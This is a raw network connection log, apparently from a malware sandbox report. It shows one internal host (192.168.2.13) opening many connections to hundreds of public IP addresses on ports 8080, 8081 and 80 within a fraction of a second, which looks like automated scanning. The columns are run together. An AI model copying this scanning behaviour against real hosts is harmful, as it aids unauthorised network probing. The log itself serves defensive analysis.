                                                        Mar 21, 2024 05:21:47.395272017 CET497128080192.168.2.13172.54.251.100
                                                        Mar 21, 2024 05:21:47.395284891 CET512488081192.168.2.1378.241.19.61
                                                        Mar 21, 2024 05:21:47.395286083 CET512488081192.168.2.13212.30.10.165
                                                        Mar 21, 2024 05:21:47.395286083 CET497128080192.168.2.13184.144.72.209
                                                        Mar 21, 2024 05:21:47.395286083 CET512488081192.168.2.13138.211.130.194
                                                        Mar 21, 2024 05:21:47.395286083 CET497128080192.168.2.13184.0.222.102
                                                        Mar 21, 2024 05:21:47.395287991 CET497128080192.168.2.13184.252.118.145
                                                        Mar 21, 2024 05:21:47.395287991 CET497128080192.168.2.1398.101.5.239
                                                        Mar 21, 2024 05:21:47.395287991 CET512488081192.168.2.1336.23.60.226
                                                        Mar 21, 2024 05:21:47.395298958 CET497128080192.168.2.13184.252.17.180
                                                        Mar 21, 2024 05:21:47.395304918 CET512488081192.168.2.13195.199.46.51
                                                        Mar 21, 2024 05:21:47.395304918 CET497128080192.168.2.1398.179.173.253
                                                        Mar 21, 2024 05:21:47.395322084 CET512488081192.168.2.13121.107.191.115
                                                        Mar 21, 2024 05:21:47.395323038 CET512488081192.168.2.1372.58.225.125
                                                        Mar 21, 2024 05:21:47.395322084 CET512488081192.168.2.1359.54.247.121
                                                        Mar 21, 2024 05:21:47.395323038 CET497128080192.168.2.1398.4.66.241
                                                        Mar 21, 2024 05:21:47.395324945 CET497128080192.168.2.13172.154.179.203
                                                        Mar 21, 2024 05:21:47.395322084 CET497128080192.168.2.13184.18.29.75
                                                        Mar 21, 2024 05:21:47.395323992 CET512488081192.168.2.1388.72.56.212
                                                        Mar 21, 2024 05:21:47.395323038 CET512488081192.168.2.1327.151.139.108
                                                        Mar 21, 2024 05:21:47.395327091 CET512488081192.168.2.1365.130.10.67
                                                        Mar 21, 2024 05:21:47.395323038 CET512488081192.168.2.1398.246.144.236
                                                        Mar 21, 2024 05:21:47.395327091 CET512488081192.168.2.13129.41.254.152
                                                        Mar 21, 2024 05:21:47.395327091 CET512488081192.168.2.1379.235.184.179
                                                        Mar 21, 2024 05:21:47.395323038 CET512488081192.168.2.13163.221.5.241
                                                        Mar 21, 2024 05:21:47.395325899 CET497128080192.168.2.1398.99.31.156
                                                        Mar 21, 2024 05:21:47.395327091 CET512488081192.168.2.13186.173.190.69
                                                        Mar 21, 2024 05:21:47.395325899 CET512488081192.168.2.13129.162.17.152
                                                        Mar 21, 2024 05:21:47.395323038 CET497128080192.168.2.13172.174.34.13
                                                        Mar 21, 2024 05:21:47.395327091 CET497128080192.168.2.13172.20.166.77
                                                        Mar 21, 2024 05:21:47.395325899 CET512488081192.168.2.13162.65.72.89
                                                        Mar 21, 2024 05:21:47.395323992 CET512488081192.168.2.1347.252.206.220
                                                        Mar 21, 2024 05:21:47.395330906 CET512488081192.168.2.13142.133.177.8
                                                        Mar 21, 2024 05:21:47.395323038 CET497128080192.168.2.13184.164.32.183
                                                        Mar 21, 2024 05:21:47.395330906 CET512488081192.168.2.1384.119.107.83
                                                        Mar 21, 2024 05:21:47.395323038 CET512488081192.168.2.13113.253.232.46
                                                        Mar 21, 2024 05:21:47.395330906 CET497128080192.168.2.13172.197.163.81
                                                        Mar 21, 2024 05:21:47.395325899 CET497128080192.168.2.13172.217.37.184
                                                        Mar 21, 2024 05:21:47.395330906 CET497128080192.168.2.13184.50.115.177
                                                        Mar 21, 2024 05:21:47.395325899 CET497128080192.168.2.13172.216.76.169
                                                        Mar 21, 2024 05:21:47.395330906 CET512488081192.168.2.13179.149.206.178
                                                        Mar 21, 2024 05:21:47.395323992 CET512488081192.168.2.1383.106.44.127
                                                        Mar 21, 2024 05:21:47.395325899 CET512488081192.168.2.1358.144.155.157
                                                        Mar 21, 2024 05:21:47.395350933 CET512488081192.168.2.138.79.178.44
                                                        Mar 21, 2024 05:21:47.395350933 CET497128080192.168.2.13184.163.190.43
                                                        Mar 21, 2024 05:21:47.395351887 CET512488081192.168.2.1357.192.254.54
                                                        Mar 21, 2024 05:21:47.395351887 CET512488081192.168.2.13188.130.33.157
                                                        Mar 21, 2024 05:21:47.395351887 CET512488081192.168.2.1395.26.98.233
                                                        Mar 21, 2024 05:21:47.395351887 CET512488081192.168.2.13112.137.6.103
                                                        Mar 21, 2024 05:21:47.395351887 CET512488081192.168.2.13119.137.243.203
                                                        Mar 21, 2024 05:21:47.395351887 CET512488081192.168.2.13115.75.159.92
                                                        Mar 21, 2024 05:21:47.395351887 CET512488081192.168.2.1359.71.255.29
                                                        Mar 21, 2024 05:21:47.395363092 CET497128080192.168.2.13184.142.150.210
                                                        Mar 21, 2024 05:21:47.395363092 CET512488081192.168.2.13180.160.214.172
                                                        Mar 21, 2024 05:21:47.395363092 CET497128080192.168.2.13184.16.108.47
                                                        Mar 21, 2024 05:21:47.395363092 CET497128080192.168.2.13184.93.176.76
                                                        Mar 21, 2024 05:21:47.395363092 CET497128080192.168.2.13184.201.93.60
                                                        Mar 21, 2024 05:21:47.395363092 CET512488081192.168.2.1395.220.198.136
                                                        Mar 21, 2024 05:21:47.395363092 CET512488081192.168.2.1314.83.45.62
                                                        Mar 21, 2024 05:21:47.395363092 CET512488081192.168.2.13163.198.248.120
                                                        Mar 21, 2024 05:21:47.395365000 CET512488081192.168.2.13194.0.230.60
                                                        Mar 21, 2024 05:21:47.395365000 CET497128080192.168.2.13184.192.178.34
                                                        Mar 21, 2024 05:21:47.395365000 CET512488081192.168.2.1385.170.213.122
                                                        Mar 21, 2024 05:21:47.395365000 CET497128080192.168.2.1398.181.96.230
                                                        Mar 21, 2024 05:21:47.395365000 CET497128080192.168.2.13184.119.179.98
                                                        Mar 21, 2024 05:21:47.395365000 CET512488081192.168.2.13200.151.90.152
                                                        Mar 21, 2024 05:21:47.395369053 CET497128080192.168.2.13184.218.72.49
                                                        Mar 21, 2024 05:21:47.395369053 CET497128080192.168.2.13184.223.14.61
                                                        Mar 21, 2024 05:21:47.395369053 CET512488081192.168.2.13124.173.223.111
                                                        Mar 21, 2024 05:21:47.395369053 CET497128080192.168.2.13172.205.89.57
                                                        Mar 21, 2024 05:21:47.395369053 CET497128080192.168.2.13172.45.210.204
                                                        Mar 21, 2024 05:21:47.395369053 CET512488081192.168.2.1318.206.70.107
                                                        Mar 21, 2024 05:21:47.395390034 CET512488081192.168.2.1338.170.169.40
                                                        Mar 21, 2024 05:21:47.395390034 CET512488081192.168.2.13192.17.29.12
                                                        Mar 21, 2024 05:21:47.395390034 CET497128080192.168.2.13172.69.137.3
                                                        Mar 21, 2024 05:21:47.395390034 CET497128080192.168.2.13184.9.46.135
                                                        Mar 21, 2024 05:21:47.395390034 CET512488081192.168.2.1388.113.153.131
                                                        Mar 21, 2024 05:21:47.395390034 CET512488081192.168.2.1394.181.25.54
                                                        Mar 21, 2024 05:21:47.395390034 CET497128080192.168.2.13172.61.1.33
                                                        Mar 21, 2024 05:21:47.395390034 CET512488081192.168.2.1372.207.73.210
                                                        Mar 21, 2024 05:21:47.395410061 CET512488081192.168.2.13139.181.156.7
                                                        Mar 21, 2024 05:21:47.395410061 CET512488081192.168.2.1327.18.172.142
                                                        Mar 21, 2024 05:21:47.395410061 CET512488081192.168.2.1362.139.76.231
                                                        Mar 21, 2024 05:21:47.395410061 CET497128080192.168.2.13172.213.37.109
                                                        Mar 21, 2024 05:21:47.395410061 CET512488081192.168.2.13196.253.18.20
                                                        Mar 21, 2024 05:21:47.395410061 CET512488081192.168.2.13156.176.196.109
                                                        Mar 21, 2024 05:21:47.395410061 CET497128080192.168.2.1398.244.18.112
                                                        Mar 21, 2024 05:21:47.395410061 CET512488081192.168.2.13123.10.123.242
                                                        Mar 21, 2024 05:21:47.395433903 CET512488081192.168.2.1390.77.76.212
                                                        Mar 21, 2024 05:21:47.395433903 CET512488081192.168.2.13178.177.108.174
                                                        Mar 21, 2024 05:21:47.395433903 CET497128080192.168.2.13172.174.208.41
                                                        Mar 21, 2024 05:21:47.395433903 CET497128080192.168.2.1398.171.240.252
                                                        Mar 21, 2024 05:21:47.395433903 CET512488081192.168.2.13138.227.95.171
                                                        Mar 21, 2024 05:21:47.395433903 CET497128080192.168.2.1398.103.134.143
                                                        Mar 21, 2024 05:21:47.395433903 CET512488081192.168.2.13169.15.194.99
                                                        Mar 21, 2024 05:21:47.395433903 CET512488081192.168.2.13108.196.254.44
                                                        Mar 21, 2024 05:21:47.395448923 CET512488081192.168.2.13128.230.14.142
                                                        Mar 21, 2024 05:21:47.395448923 CET497128080192.168.2.13172.66.94.38
                                                        Mar 21, 2024 05:21:47.395448923 CET512488081192.168.2.1313.83.80.238
                                                        Mar 21, 2024 05:21:47.395448923 CET512488081192.168.2.13163.59.0.39
                                                        Mar 21, 2024 05:21:47.395448923 CET497128080192.168.2.13172.39.171.235
                                                        Mar 21, 2024 05:21:47.395448923 CET512488081192.168.2.1368.178.123.124
                                                        Mar 21, 2024 05:21:47.395448923 CET497128080192.168.2.13184.128.108.163
                                                        Mar 21, 2024 05:21:47.395467997 CET497128080192.168.2.13184.199.5.127
                                                        Mar 21, 2024 05:21:47.395467997 CET512488081192.168.2.13124.188.108.108
                                                        Mar 21, 2024 05:21:47.395467997 CET512488081192.168.2.13188.226.126.205
                                                        Mar 21, 2024 05:21:47.395468950 CET512488081192.168.2.13150.140.252.131
                                                        Mar 21, 2024 05:21:47.395468950 CET512488081192.168.2.13187.32.193.105
                                                        Mar 21, 2024 05:21:47.395468950 CET512488081192.168.2.13134.5.247.124
                                                        Mar 21, 2024 05:21:47.395468950 CET512488081192.168.2.13166.97.159.98
                                                        Mar 21, 2024 05:21:47.395468950 CET512488081192.168.2.13161.70.214.236
                                                        Mar 21, 2024 05:21:47.395476103 CET497128080192.168.2.13172.40.252.112
                                                        Mar 21, 2024 05:21:47.395476103 CET497128080192.168.2.13184.18.142.164
                                                        Mar 21, 2024 05:21:47.395476103 CET497128080192.168.2.1398.126.13.97
                                                        Mar 21, 2024 05:21:47.395476103 CET512488081192.168.2.13145.158.213.176
                                                        Mar 21, 2024 05:21:47.395476103 CET497128080192.168.2.13184.119.215.177
                                                        Mar 21, 2024 05:21:47.395476103 CET512488081192.168.2.13210.48.10.93
                                                        Mar 21, 2024 05:21:47.395476103 CET512488081192.168.2.13213.36.249.165
                                                        Mar 21, 2024 05:21:47.395476103 CET512488081192.168.2.13198.58.128.139
                                                        Mar 21, 2024 05:21:47.395487070 CET512488081192.168.2.1396.102.160.207
                                                        Mar 21, 2024 05:21:47.395487070 CET512488081192.168.2.1376.252.205.61
                                                        Mar 21, 2024 05:21:47.395488024 CET497128080192.168.2.1398.79.140.126
                                                        Mar 21, 2024 05:21:47.395488024 CET497128080192.168.2.13172.85.81.201
                                                        Mar 21, 2024 05:21:47.395488024 CET497128080192.168.2.1398.155.215.68
                                                        Mar 21, 2024 05:21:47.395488024 CET512488081192.168.2.1386.9.106.199
                                                        Mar 21, 2024 05:21:47.395488024 CET497128080192.168.2.1398.99.39.168
                                                        Mar 21, 2024 05:21:47.395505905 CET512488081192.168.2.1314.236.126.230
                                                        Mar 21, 2024 05:21:47.395505905 CET512488081192.168.2.1323.188.142.128
                                                        Mar 21, 2024 05:21:47.395505905 CET497128080192.168.2.13184.29.45.9
                                                        Mar 21, 2024 05:21:47.395505905 CET512488081192.168.2.1341.248.150.192
                                                        Mar 21, 2024 05:21:47.395505905 CET497128080192.168.2.13172.88.156.68
                                                        Mar 21, 2024 05:21:47.395505905 CET497128080192.168.2.13172.62.14.45
                                                        Mar 21, 2024 05:21:47.395505905 CET497128080192.168.2.13184.50.33.186
                                                        Mar 21, 2024 05:21:47.395505905 CET497128080192.168.2.13184.111.73.150
                                                        Mar 21, 2024 05:21:47.395510912 CET512488081192.168.2.13146.37.252.123
                                                        Mar 21, 2024 05:21:47.395510912 CET497128080192.168.2.13172.210.149.88
                                                        Mar 21, 2024 05:21:47.395510912 CET512488081192.168.2.1389.20.98.33
                                                        Mar 21, 2024 05:21:47.395510912 CET497128080192.168.2.1398.58.90.73
                                                        Mar 21, 2024 05:21:47.395510912 CET497128080192.168.2.1398.62.68.128
                                                        Mar 21, 2024 05:21:47.395510912 CET497128080192.168.2.13172.49.237.194
                                                        Mar 21, 2024 05:21:47.395510912 CET497128080192.168.2.1398.184.248.196
                                                        Mar 21, 2024 05:21:47.395510912 CET497128080192.168.2.13172.74.87.62
                                                        Mar 21, 2024 05:21:47.395538092 CET512488081192.168.2.13133.152.151.166
                                                        Mar 21, 2024 05:21:47.395538092 CET512488081192.168.2.1366.136.185.180
                                                        Mar 21, 2024 05:21:47.395538092 CET497128080192.168.2.13184.65.114.132
                                                        Mar 21, 2024 05:21:47.395538092 CET512488081192.168.2.1360.148.250.40
                                                        Mar 21, 2024 05:21:47.395539045 CET497128080192.168.2.13184.208.124.36
                                                        Mar 21, 2024 05:21:47.395538092 CET512488081192.168.2.13185.93.141.83
                                                        Mar 21, 2024 05:21:47.395539045 CET512488081192.168.2.1367.156.116.192
                                                        Mar 21, 2024 05:21:47.395538092 CET512488081192.168.2.13158.227.243.172
                                                        Mar 21, 2024 05:21:47.395539045 CET497128080192.168.2.13184.247.232.38
                                                        Mar 21, 2024 05:21:47.395539045 CET512488081192.168.2.1314.56.179.214
                                                        Mar 21, 2024 05:21:47.395539045 CET512488081192.168.2.1361.117.178.15
                                                        Mar 21, 2024 05:21:47.395539045 CET512488081192.168.2.1368.185.236.144
                                                        Mar 21, 2024 05:21:47.395539045 CET512488081192.168.2.1360.238.67.191
                                                        Mar 21, 2024 05:21:47.395539045 CET512488081192.168.2.13162.222.35.213
                                                        Mar 21, 2024 05:21:47.395576000 CET497128080192.168.2.13172.81.165.189
                                                        Mar 21, 2024 05:21:47.395576000 CET512488081192.168.2.13188.14.189.222
                                                        Mar 21, 2024 05:21:47.395576000 CET497128080192.168.2.13184.85.247.133
                                                        Mar 21, 2024 05:21:47.395576000 CET497128080192.168.2.13184.51.171.6
                                                        Mar 21, 2024 05:21:47.395576000 CET512488081192.168.2.13160.42.41.169
                                                        Mar 21, 2024 05:21:47.395576000 CET497128080192.168.2.1398.166.212.211
                                                        Mar 21, 2024 05:21:47.395576000 CET512488081192.168.2.13171.209.184.101
                                                        Mar 21, 2024 05:21:47.395576000 CET497128080192.168.2.1398.213.161.104
                                                        Mar 21, 2024 05:21:47.395580053 CET512488081192.168.2.13113.12.3.45
                                                        Mar 21, 2024 05:21:47.395580053 CET497128080192.168.2.1398.252.223.126
                                                        Mar 21, 2024 05:21:47.395581007 CET497128080192.168.2.13172.234.108.95
                                                        Mar 21, 2024 05:21:47.395581007 CET512488081192.168.2.1332.156.48.16
                                                        Mar 21, 2024 05:21:47.395581007 CET512488081192.168.2.13206.137.162.68
                                                        Mar 21, 2024 05:21:47.395581007 CET497128080192.168.2.13172.196.248.237
                                                        Mar 21, 2024 05:21:47.395581007 CET497128080192.168.2.13184.133.71.95
                                                        Mar 21, 2024 05:21:47.395581007 CET512488081192.168.2.13200.255.211.147
                                                        Mar 21, 2024 05:21:47.395582914 CET512488081192.168.2.1392.155.246.227
                                                        Mar 21, 2024 05:21:47.395582914 CET512488081192.168.2.13220.82.133.76
                                                        Mar 21, 2024 05:21:47.395582914 CET497128080192.168.2.13184.255.117.56
                                                        Mar 21, 2024 05:21:47.395582914 CET512488081192.168.2.1380.195.181.224
                                                        Mar 21, 2024 05:21:47.395582914 CET512488081192.168.2.138.54.29.198
                                                        Mar 21, 2024 05:21:47.395582914 CET512488081192.168.2.13208.146.113.58
                                                        Mar 21, 2024 05:21:47.395582914 CET497128080192.168.2.1398.220.191.190
                                                        Mar 21, 2024 05:21:47.395601034 CET512488081192.168.2.13205.195.125.44
                                                        Mar 21, 2024 05:21:47.395601034 CET512488081192.168.2.1397.59.200.145
                                                        Mar 21, 2024 05:21:47.395601034 CET497128080192.168.2.1398.127.141.49
                                                        Mar 21, 2024 05:21:47.395601034 CET512488081192.168.2.13153.187.167.219
                                                        Mar 21, 2024 05:21:47.395601988 CET512488081192.168.2.1364.240.58.53
                                                        Mar 21, 2024 05:21:47.395601988 CET497128080192.168.2.13172.131.109.9
                                                        Mar 21, 2024 05:21:47.395601988 CET512488081192.168.2.13139.163.152.85
                                                        Mar 21, 2024 05:21:47.395601988 CET512488081192.168.2.1387.251.107.40
                                                        Mar 21, 2024 05:21:47.395606041 CET497128080192.168.2.13172.124.224.31
                                                        Mar 21, 2024 05:21:47.395606041 CET512488081192.168.2.1313.48.30.68
                                                        Mar 21, 2024 05:21:47.395606041 CET512488081192.168.2.131.225.168.248
                                                        Mar 21, 2024 05:21:47.395606041 CET512488081192.168.2.1337.36.182.15
                                                        Mar 21, 2024 05:21:47.395617008 CET497128080192.168.2.13172.73.21.71
                                                        Mar 21, 2024 05:21:47.395617008 CET512488081192.168.2.1378.216.145.172
                                                        Mar 21, 2024 05:21:47.395617962 CET512488081192.168.2.13162.86.149.45
                                                        Mar 21, 2024 05:21:47.395617962 CET512488081192.168.2.13207.203.158.133
                                                        Mar 21, 2024 05:21:47.395617962 CET512488081192.168.2.13124.167.183.16
                                                        Mar 21, 2024 05:21:47.395617962 CET512488081192.168.2.13200.90.111.162
                                                        Mar 21, 2024 05:21:47.395653963 CET512488081192.168.2.13164.123.241.65
                                                        Mar 21, 2024 05:21:47.395653963 CET497128080192.168.2.13172.231.53.208
                                                        Mar 21, 2024 05:21:47.395653963 CET512488081192.168.2.1334.250.69.90
                                                        Mar 21, 2024 05:21:47.395653963 CET497128080192.168.2.1398.126.61.63
                                                        Mar 21, 2024 05:21:47.395653963 CET512488081192.168.2.13169.204.64.82
                                                        Mar 21, 2024 05:21:47.395653963 CET497128080192.168.2.13184.99.210.206
                                                        Mar 21, 2024 05:21:47.395653963 CET512488081192.168.2.1372.139.163.182
                                                        Mar 21, 2024 05:21:47.395653963 CET497128080192.168.2.13184.181.47.161
                                                        Mar 21, 2024 05:21:47.395662069 CET497128080192.168.2.13172.186.200.95
                                                        Mar 21, 2024 05:21:47.395662069 CET512488081192.168.2.1369.37.65.24
                                                        Mar 21, 2024 05:21:47.395662069 CET497128080192.168.2.13172.172.114.133
                                                        Mar 21, 2024 05:21:47.395662069 CET497128080192.168.2.13172.81.247.35
                                                        Mar 21, 2024 05:21:47.395662069 CET512488081192.168.2.13218.196.38.47
                                                        Mar 21, 2024 05:21:47.395662069 CET512488081192.168.2.1353.21.30.248
                                                        Mar 21, 2024 05:21:47.395662069 CET512488081192.168.2.13123.166.175.249
                                                        Mar 21, 2024 05:21:47.395662069 CET497128080192.168.2.13172.157.151.210
                                                        Mar 21, 2024 05:21:47.395694971 CET497128080192.168.2.13184.34.131.8
                                                        Mar 21, 2024 05:21:47.395694971 CET512488081192.168.2.13205.124.87.67
                                                        Mar 21, 2024 05:21:47.395694971 CET497128080192.168.2.13172.181.206.112
                                                        Mar 21, 2024 05:21:47.395698071 CET497128080192.168.2.1398.126.2.79
                                                        Mar 21, 2024 05:21:47.395694971 CET497128080192.168.2.13184.139.67.102
                                                        Mar 21, 2024 05:21:47.395698071 CET497128080192.168.2.13184.180.228.235
                                                        Mar 21, 2024 05:21:47.395694971 CET512488081192.168.2.13165.66.28.224
                                                        Mar 21, 2024 05:21:47.395699978 CET497128080192.168.2.13172.128.193.45
                                                        Mar 21, 2024 05:21:47.395694971 CET497128080192.168.2.13184.62.39.34
                                                        Mar 21, 2024 05:21:47.395694971 CET497128080192.168.2.1398.166.132.74
                                                        Mar 21, 2024 05:21:47.395699978 CET497128080192.168.2.13184.76.51.54
                                                        Mar 21, 2024 05:21:47.395694971 CET497128080192.168.2.1398.162.196.219
                                                        Mar 21, 2024 05:21:47.395699978 CET512488081192.168.2.13156.20.22.1
                                                        Mar 21, 2024 05:21:47.395699978 CET497128080192.168.2.13172.1.9.229
                                                        Mar 21, 2024 05:21:47.395699978 CET497128080192.168.2.1398.50.246.203
                                                        Mar 21, 2024 05:21:47.395699978 CET497128080192.168.2.13172.149.141.193
                                                        Mar 21, 2024 05:21:47.395711899 CET497128080192.168.2.1398.77.54.244
                                                        Mar 21, 2024 05:21:47.395723104 CET497128080192.168.2.13172.228.31.54
                                                        Mar 21, 2024 05:21:47.395736933 CET497128080192.168.2.13184.119.215.197
                                                        Mar 21, 2024 05:21:47.395745039 CET497128080192.168.2.13184.184.178.207
                                                        Mar 21, 2024 05:21:47.395745039 CET512488081192.168.2.1317.224.147.242
                                                        Mar 21, 2024 05:21:47.395745039 CET497128080192.168.2.1398.226.238.51
                                                        Mar 21, 2024 05:21:47.395745039 CET512488081192.168.2.1354.170.87.31
                                                        Mar 21, 2024 05:21:47.395745993 CET497128080192.168.2.13184.37.152.205
                                                        Mar 21, 2024 05:21:47.395745993 CET512488081192.168.2.13179.9.188.219
                                                        Mar 21, 2024 05:21:47.395745993 CET512488081192.168.2.1366.57.56.14
                                                        Mar 21, 2024 05:21:47.395745993 CET512488081192.168.2.1378.60.149.99
                                                        Mar 21, 2024 05:21:47.395764112 CET497128080192.168.2.1398.236.140.87
                                                        Mar 21, 2024 05:21:47.395765066 CET497128080192.168.2.13172.119.253.178
                                                        Mar 21, 2024 05:21:47.395765066 CET497128080192.168.2.13172.69.162.110
                                                        Mar 21, 2024 05:21:47.395765066 CET497128080192.168.2.13172.245.170.203
                                                        Mar 21, 2024 05:21:47.395765066 CET497128080192.168.2.13184.146.157.187
                                                        Mar 21, 2024 05:21:47.395766973 CET497128080192.168.2.13172.159.161.15
                                                        Mar 21, 2024 05:21:47.395766973 CET497128080192.168.2.13172.172.112.109
                                                        Mar 21, 2024 05:21:47.395766973 CET497128080192.168.2.1398.97.12.117
                                                        Mar 21, 2024 05:21:47.395766973 CET497128080192.168.2.13172.91.41.34
                                                        Mar 21, 2024 05:21:47.395766973 CET497128080192.168.2.13184.185.67.225
                                                        Mar 21, 2024 05:21:47.395766973 CET512488081192.168.2.13208.127.13.7
                                                        Mar 21, 2024 05:21:47.395766973 CET512488081192.168.2.13122.7.49.108
                                                        Mar 21, 2024 05:21:47.395766973 CET497128080192.168.2.13184.68.63.214
                                                        Mar 21, 2024 05:21:47.395766973 CET497128080192.168.2.1398.139.189.155
                                                        Mar 21, 2024 05:21:47.395778894 CET497128080192.168.2.13184.152.11.250
                                                        Mar 21, 2024 05:21:47.395792007 CET497128080192.168.2.1398.213.154.81
                                                        Mar 21, 2024 05:21:47.395802975 CET497128080192.168.2.13172.235.174.147
                                                        Mar 21, 2024 05:21:47.395802975 CET497128080192.168.2.13172.209.245.118
                                                        Mar 21, 2024 05:21:47.395802975 CET497128080192.168.2.1398.183.203.20
                                                        Mar 21, 2024 05:21:47.395802975 CET497128080192.168.2.13172.121.50.190
                                                        Mar 21, 2024 05:21:47.395802975 CET497128080192.168.2.13184.238.39.70
                                                        Mar 21, 2024 05:21:47.395803928 CET497128080192.168.2.1398.199.44.235
                                                        Mar 21, 2024 05:21:47.395803928 CET497128080192.168.2.13172.176.61.25
                                                        Mar 21, 2024 05:21:47.395803928 CET497128080192.168.2.13172.229.226.155
                                                        Mar 21, 2024 05:21:47.395807028 CET497128080192.168.2.13184.49.144.80
                                                        Mar 21, 2024 05:21:47.395823002 CET497128080192.168.2.13172.78.144.20
                                                        Mar 21, 2024 05:21:47.395829916 CET512488081192.168.2.1368.83.25.106
                                                        Mar 21, 2024 05:21:47.395829916 CET497128080192.168.2.13184.145.106.64
                                                        Mar 21, 2024 05:21:47.395829916 CET512488081192.168.2.1344.164.143.38
                                                        Mar 21, 2024 05:21:47.395829916 CET497128080192.168.2.13172.214.111.28
                                                        Mar 21, 2024 05:21:47.395829916 CET497128080192.168.2.13172.208.124.187
                                                        Mar 21, 2024 05:21:47.395829916 CET497128080192.168.2.1398.219.69.25
                                                        Mar 21, 2024 05:21:47.395829916 CET497128080192.168.2.13172.165.252.170
                                                        Mar 21, 2024 05:21:47.395829916 CET497128080192.168.2.1398.241.221.1
                                                        Mar 21, 2024 05:21:47.395843029 CET497128080192.168.2.13184.88.90.135
                                                        Mar 21, 2024 05:21:47.395849943 CET497128080192.168.2.13184.228.110.136
                                                        Mar 21, 2024 05:21:47.395849943 CET497128080192.168.2.1398.156.173.149
                                                        Mar 21, 2024 05:21:47.395852089 CET497128080192.168.2.1398.210.120.75
                                                        Mar 21, 2024 05:21:47.395853043 CET497128080192.168.2.13172.113.51.32
                                                        Mar 21, 2024 05:21:47.395854950 CET497128080192.168.2.13172.123.20.149
                                                        Mar 21, 2024 05:21:47.395854950 CET497128080192.168.2.13172.238.20.39
                                                        Mar 21, 2024 05:21:47.395868063 CET497128080192.168.2.13172.120.170.96
                                                        Mar 21, 2024 05:21:47.395873070 CET497128080192.168.2.13172.35.127.219
                                                        Mar 21, 2024 05:21:47.395886898 CET497128080192.168.2.1398.236.211.209
                                                        Mar 21, 2024 05:21:47.395899057 CET497128080192.168.2.13172.163.136.216
                                                        Mar 21, 2024 05:21:47.395914078 CET497128080192.168.2.13172.41.65.211
                                                        Mar 21, 2024 05:21:47.395919085 CET497128080192.168.2.13172.104.120.220
                                                        Mar 21, 2024 05:21:47.395931959 CET497128080192.168.2.13184.240.218.255
                                                        Mar 21, 2024 05:21:47.395931005 CET497128080192.168.2.13172.103.106.41
                                                        Mar 21, 2024 05:21:47.395931959 CET497128080192.168.2.13184.206.132.65
                                                        Mar 21, 2024 05:21:47.395931005 CET497128080192.168.2.13172.50.255.86
                                                        Mar 21, 2024 05:21:47.395951986 CET497128080192.168.2.13184.4.180.221
                                                        Mar 21, 2024 05:21:47.395956993 CET497128080192.168.2.13184.110.224.233
                                                        Mar 21, 2024 05:21:47.395962000 CET497128080192.168.2.1398.138.51.161
                                                        Mar 21, 2024 05:21:47.395963907 CET497128080192.168.2.13172.249.33.18
                                                        Mar 21, 2024 05:21:47.395968914 CET497128080192.168.2.1398.151.62.9
                                                        Mar 21, 2024 05:21:47.395975113 CET497128080192.168.2.13172.232.140.216
                                                        Mar 21, 2024 05:21:47.395976067 CET497128080192.168.2.1398.183.34.131
                                                        Mar 21, 2024 05:21:47.395994902 CET497128080192.168.2.13172.126.211.170
                                                        Mar 21, 2024 05:21:47.395994902 CET497128080192.168.2.1398.199.67.34
                                                        Mar 21, 2024 05:21:47.396012068 CET497128080192.168.2.13184.131.27.26
                                                        Mar 21, 2024 05:21:47.396018028 CET497128080192.168.2.13172.116.34.40
                                                        Mar 21, 2024 05:21:47.396018028 CET497128080192.168.2.13184.179.24.107
                                                        Mar 21, 2024 05:21:47.396027088 CET497128080192.168.2.1398.234.236.103
                                                        Mar 21, 2024 05:21:47.396039009 CET497128080192.168.2.13172.208.42.134
                                                        Mar 21, 2024 05:21:47.396039009 CET497128080192.168.2.13184.128.200.103
                                                        Mar 21, 2024 05:21:47.396039009 CET497128080192.168.2.13172.162.204.174
                                                        Mar 21, 2024 05:21:47.396066904 CET497128080192.168.2.1398.243.130.161
                                                        Mar 21, 2024 05:21:47.396066904 CET497128080192.168.2.1398.36.50.169
                                                        Mar 21, 2024 05:21:47.396069050 CET497128080192.168.2.13184.18.16.119
                                                        Mar 21, 2024 05:21:47.396075964 CET497128080192.168.2.13184.67.241.89
                                                        Mar 21, 2024 05:21:47.396083117 CET497128080192.168.2.13184.143.198.3
                                                        Mar 21, 2024 05:21:47.396083117 CET497128080192.168.2.13184.161.85.107
                                                        Mar 21, 2024 05:21:47.396089077 CET497128080192.168.2.1398.199.190.179
                                                        Mar 21, 2024 05:21:47.396089077 CET497128080192.168.2.13172.234.232.157
                                                        Mar 21, 2024 05:21:47.396092892 CET497128080192.168.2.13172.78.73.3
                                                        Mar 21, 2024 05:21:47.396110058 CET497128080192.168.2.13184.180.73.101
                                                        Mar 21, 2024 05:21:47.396112919 CET497128080192.168.2.1398.151.212.67
                                                        Mar 21, 2024 05:21:47.396119118 CET497128080192.168.2.1398.155.125.219
                                                        Mar 21, 2024 05:21:47.396123886 CET497128080192.168.2.1398.108.28.172
                                                        Mar 21, 2024 05:21:47.396126986 CET497128080192.168.2.13172.80.115.155
                                                        Mar 21, 2024 05:21:47.396131992 CET497128080192.168.2.13172.227.163.215
                                                        Mar 21, 2024 05:21:47.396152973 CET497128080192.168.2.13172.107.41.241
                                                        Mar 21, 2024 05:21:47.396156073 CET497128080192.168.2.1398.154.204.114
                                                        Mar 21, 2024 05:21:47.396157026 CET497128080192.168.2.13184.219.130.110
                                                        Mar 21, 2024 05:21:47.396157026 CET497128080192.168.2.13184.95.157.55
                                                        Mar 21, 2024 05:21:47.396159887 CET497128080192.168.2.13172.51.3.97
                                                        Mar 21, 2024 05:21:47.396166086 CET497128080192.168.2.13172.69.254.212
                                                        Mar 21, 2024 05:21:47.396166086 CET497128080192.168.2.13184.31.86.166
                                                        Mar 21, 2024 05:21:47.396173000 CET497128080192.168.2.13184.40.128.143
                                                        Mar 21, 2024 05:21:47.396186113 CET497128080192.168.2.13184.56.120.30
                                                        Mar 21, 2024 05:21:47.396192074 CET497128080192.168.2.13184.220.2.233
                                                        Mar 21, 2024 05:21:47.396214962 CET497128080192.168.2.13172.54.167.87
                                                        Mar 21, 2024 05:21:47.396225929 CET497128080192.168.2.13184.79.125.110
                                                        Mar 21, 2024 05:21:47.396225929 CET497128080192.168.2.1398.240.250.42
                                                        Mar 21, 2024 05:21:47.396225929 CET497128080192.168.2.13172.68.173.195
                                                        Mar 21, 2024 05:21:47.396250010 CET497128080192.168.2.1398.125.126.123
                                                        Mar 21, 2024 05:21:47.396487951 CET5099280192.168.2.138.83.87.105
                                                        Mar 21, 2024 05:21:47.396487951 CET5099280192.168.2.1310.13.239.105
                                                        Mar 21, 2024 05:21:47.396502018 CET5099280192.168.2.1328.239.241.107
                                                        Mar 21, 2024 05:21:47.396506071 CET5099280192.168.2.13148.155.2.119
